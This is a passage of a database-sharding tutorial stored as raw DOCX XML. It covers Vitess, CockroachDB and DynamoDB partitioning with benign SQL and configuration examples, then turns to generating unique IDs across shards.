        <w:t>└────────────────────</w:t>
      </w:r>
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:rFonts w:ascii="MS Gothic" w:eastAsia="MS Gothic" w:hAnsi="MS Gothic" w:cs="MS Gothic" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>┬</w:t>
      </w:r>
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t>─────────────────────────┘</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="243B1374" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">                     │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="096612B9" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">    ┌────────────────</w:t>
      </w:r>
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:rFonts w:ascii="MS Gothic" w:eastAsia="MS Gothic" w:hAnsi="MS Gothic" w:cs="MS Gothic" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>┼</w:t>
      </w:r>
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t>────────────────┐</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BE904EC" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">    │                │                │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="256E90AD" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>▼</w:t>
      </w:r>
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">                </w:t>
      </w:r>
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>▼</w:t>
      </w:r>
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">                </w:t>
      </w:r>
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>▼</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DB10681" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>┌────────┐     ┌────────┐     ┌────────┐</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B534B8C" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:lastRenderedPageBreak/>
        <w:t>│VTTablet│     │VTTablet│     │VTTablet│  (shard managers)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3585F4AE" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>│Shard -80│    │Shard 80-│    │Shard ..│</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F08813D" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>│(MySQL) │     │(MySQL)  │    │(MySQL) │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3452ECAF" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>└────────┘     └────────┘     └────────┘</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C4EC239" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Vitess sharding model:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="247DFDF1" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1571"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00875520">
        <w:t>Uses key ranges (similar to range-based but with hash of shard key).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1083DC7F" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1571"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00875520">
        <w:t>VSchema defines how tables are sharded.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DAEB4BA" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1571"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00875520">
        <w:t>VTGate handles query rewriting, scatter-gather, and cross-shard operations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22580D14" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1571"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00875520">
        <w:t>Online resharding: split shards without downtime.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26FA7303" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="711AFD26" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>// VSchema (defines sharding)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="336E8A73" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32C22A21" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  "sharded": true,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DD71159" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  "vindexes": {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EC1699D" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">    "hash": { "type": "hash" }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CFD5D2F" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  },</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EECDA46" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  "tables": {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F7E6F31" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">    "orders": {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="307C9ABF" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">      "column_vindexes": [</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37495340" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">        { "column": "customer_id", "name": "hash" }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="130B8B21" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">      ]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CE53267" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FCB62D9" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="789BF8F8" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12AB2FA4" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>10.4 CockroachDB (Automatic Sharding)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C4F6FA2" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>SQL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E7A7784" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:lastRenderedPageBreak/>
        <w:t>CREATE TABLE orders (</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B47B860" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  id UUID DEFAULT gen_random_uuid(),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69792845" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  customer_id UUID,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="680AC065" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  total DECIMAL,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F83E104" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  created_at TIMESTAMP DEFAULT now()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="015C601A" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FDF6C7B" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520"/>
    <w:p w14:paraId="49519CE0" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>-- CockroachDB automatically:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AFC1BC9" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>-- 1. Splits data into 64 MB "ranges" (chunks)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14C2C2C4" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>-- 2. Distributes ranges across nodes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EB69D64" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>-- 3. Replicates each range (Raft consensus, 3 copies)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EC0C40C" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>-- 4. Splits/merges ranges as data grows/shrinks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="142DB51D" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>-- 5. Rebalances ranges when nodes are added/removed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3889C837" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>No manual sharding configuration needed.</w:t>
      </w:r>
      <w:r w:rsidRPr="00875520">
        <w:t> The database handles it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18D2C60B" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>But you can influence placement:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6904423A" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>SQL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="636D87AE" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>-- Pin data to specific regions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BFB0B87" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>ALTER TABLE orders SET LOCALITY REGIONAL BY ROW;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68F63AC5" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520"/>
    <w:p w14:paraId="493973CE" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>-- Column determines region</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C1C7051" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>ALTER TABLE orders ADD COLUMN region crdb_internal_region AS (</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A0D9C08" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  CASE WHEN customer_country IN ('US', 'CA') THEN 'us-east1'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6727B91E" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">       WHEN customer_country IN ('DE', 'FR') THEN 'europe-west1'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79F5A869" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">       ELSE 'us-east1'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="604AAF4A" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  END</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C33A07F" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>) STORED;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53A0F038" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>10.5 DynamoDB Partitioning</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="602C6424" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="220AA414" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Table: Orders</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D45556E" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Partition key: customer_id</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37EB1F59" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Sort key: order_date</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="521E709F" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520"/>
    <w:p w14:paraId="74D3750D" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>DynamoDB automatically:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F3E6623" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  - Hashes partition key → assigns to internal partition.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47E134A4" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  - Each partition: up to 10 GB data, 3000 RCU, 1000 WCU.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25AD4F05" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  - When partition exceeds limits → automatically splits.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04BD4BAF" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  - Application never sees partitions (fully managed).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D0D3C62" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Capacity modes:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FD26434" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="355AE83F" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Provisioned: Specify RCU/WCU (cheaper for predictable workloads)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B8C8C0E" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>On-demand: Auto-scales (more expensive per request, no capacity planning)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59E5E6C0" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Hot partition problem:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63D242B8" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1456670F" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>If one partition key receives too much traffic:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51BC7899" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  DynamoDB throttles requests to that partition (ProvisionedThroughputExceededException).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="466B70BB" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22D08609" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Solutions:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34B2C16A" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  - Better partition key (higher cardinality).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48B2D78C" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  - Write sharding: append random suffix to partition key.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1004001C" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  - DynamoDB Adaptive Capacity: automatically rebalances (helps, but has limits).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0484FB61" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:pict w14:anchorId="62C1763F">
          <v:rect id="_x0000_i5768" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CAC7D78" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>11. Sharding and ID Generation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00565E82" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>11.1 The Problem</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C7442B9" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>In a single database: AUTO_INCREMENT gives unique, sequential IDs. In a sharded database: multiple shards independently generating IDs → collisions!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63306E1A" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53FCBAD2" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Shard 1: INSERT → id = 1, 2, 3, 4, 5...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2197DD9D" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Shard 2: INSERT → id = 1, 2, 3, 4, 5...  ← COLLISION!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A1D82E9" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>11.2 Solutions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39340B4C" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>1. UUID (Universally Unique Identifier):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CA2369B" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1615A38A" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>id = uuid4()  → "550e8400-e29b-41d4-a716-446655440000"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="572FA6B2" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520"/>
    <w:p w14:paraId="5A1AD207" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Pros: Globally unique, no coordination needed, any node generates independently.</w:t>
      </w:r>
    </w:p>
